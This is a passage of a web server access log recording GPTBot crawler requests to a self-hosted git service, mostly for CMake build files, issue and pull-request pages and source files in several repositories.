GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11030] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15275] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:18:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11593] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:18:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11275] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:18:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 18545] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12375] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.18] [Sent-to 